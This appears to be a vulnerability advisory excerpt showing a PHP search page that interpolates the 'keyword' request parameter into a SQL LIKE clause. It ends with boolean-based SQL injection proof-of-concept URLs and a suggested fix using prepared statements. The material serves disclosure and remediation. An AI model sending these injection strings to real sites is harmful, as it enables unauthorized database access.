// Search page excerpt quoted by the advisory as the vulnerable code path.
// Shared bootstrap; presumably provides $lang, sexit() and template() used below (not shown here; confirm).
include_once 'common.php';
// SECURITY: the search term is read verbatim from the request. $_REQUEST merges GET/POST
// (and cookies, depending on request_order), so the value is fully attacker-controlled.
$keyword = $_REQUEST['keyword']; // untrusted input: no validation or escaping is applied in this excerpt
// The only check is empty(): it rejects '' and '0' but does nothing about quotes or other SQL metacharacters.
// sexit() presumably prints the error and stops the request (defined elsewhere; confirm).
if(empty($keyword)) sexit($lang['arg_error']); $where = '';
// SECURITY (SQL injection): $keyword is interpolated directly into the string literal of the LIKE
// clause, so a single quote in the input closes the literal and the rest is parsed as SQL.
// Fix: pass the term as a bound parameter of a prepared statement and escape the LIKE
// wildcards (% and _) in it, instead of building the clause by string interpolation.
$where .= " title LIKE '%{$keyword}%'";// % on both sides: fuzzy (substring) match
$title = '搜索';
// The advisory elides the rest of the script here; the statement that executes the query
// built from $where is not shown, so the database API in use cannot be confirmed.
.... include template('search');
POC(用于验证是否存在注入的布尔测试):
http://HdhCmsTest2cto测试数据 /search.php?keyword=w%'%20and%201=1%20and%20'%'=' //and 1=1
http://HdhCmsTest2cto测试数据 /search.php?keyword=w%'%20and%201=2%20and%20'%'=' //and 1=2
http://HdhCmsTest2cto测试数据 /search.php?keyword={关键字}{SQL}
两个请求只在恒真(1=1)与恒假(1=2)条件上不同;若两次返回的搜索结果不同,说明 keyword 被直接拼接进了 SQL 语句。
修复:过滤搜索页面参数输入。更可靠的做法是通过预处理语句(参数绑定)传入 keyword,而不是把它拼接进 SQL 字符串,并对 LIKE 通配符 % 和 _ 进行转义。